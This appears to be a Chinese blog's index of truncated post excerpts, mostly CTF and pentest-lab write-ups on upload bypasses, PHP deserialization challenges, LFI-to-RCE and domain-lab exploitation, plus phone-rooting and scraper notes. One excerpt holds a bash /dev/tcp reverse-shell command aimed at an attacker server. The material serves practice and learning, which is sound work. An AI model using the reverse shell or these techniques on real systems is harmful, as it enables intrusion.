渗透测试1 打靶是的简单记录 flag是我拿到的时间顺序记录 flag2 访问admin跳转登录 账号密码 admin admin flag1 主页下面 文件上传的点 测试了几个上传的点都是不行 又过了一遍配置 添加运行的后缀 双写绕过即可 普通的马子就可以了,这个连接失败 flag4 <?php return [ 't...
easy serialize 源代码 <?php //flag is in /flag.php error_reporting(0); class baby{ public $var; public $var2; public $var3; public function learn($key){ echo file_get_con...
通过第三周流量分析题和题目给的源代码得到 best_admin so_hard_password 和主页存在文件包含rce漏洞 ‘ 和newstar 之前两道题目一模一样,一步的lfl+rce 和 linux 提权 这个靶机有点问题,哥斯拉不是很好用,我们反弹shell到 公网服务器上 bash -i >& /dev/tcp/攻击机IP/端口 0>&...
Unserialize Again 源题目内容 <?php highlight_file(__FILE__); error_reporting(0); class story{ private $user='admin'; public $pass; public $eating; public $God='false'; public ...
逃 <?php highlight_file(__FILE__); function waf($str){ return str_replace("bad","good",$str); } class GetFlag { public $key; public $cmd = "whoami"; public function __construct(...
POP Gadget 原题文件 <?php highlight_file(__FILE__); class Begin{ public $name; public function __destruct() { if(preg_match("/[a-zA-Z0-9]/",$this->name)){ echo...
输入内容(文件选择) 主域名,子域名,IP地址,HTTP/HTTPS 一、环境 安装pyqt pip install PyQt6 pyqt6-tools pyinstaller qt 设计师路径 C:\Program Files\Python39\Lib\site-packages\qt6...
https://pan.baidu.com/s/1DtOdje33JeoF8kcU6LBqSw?pwd=g5r4 dc 区段1 pc 区段2 区段1 web nat 区段1 外网 ms17010 是打不通的 有服务要手动起来,,,, mssql 1qaz@WSX 登录启动 weblogic 疑似存在漏洞 存在cve20160638 直接注入内存马...
小米手机在原生稳定版的情况下,获取root权限。 可能会变砖!!!自行决定! 一,打开USB调试 打开开发者选项:设置-我的设备-全部参数-MIUI版本,连续点击,直到提示已打开开发者选项 打开USB调试:设置-更多设置-开发者选项-USB调试 二,获取当前ROM版本的boot.img文件 获取当前ROM的完整卡刷包,https:/...
import requests import json def main(page): url = "https://www.butian.net/Reward/pub" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML...
A new version of content is available.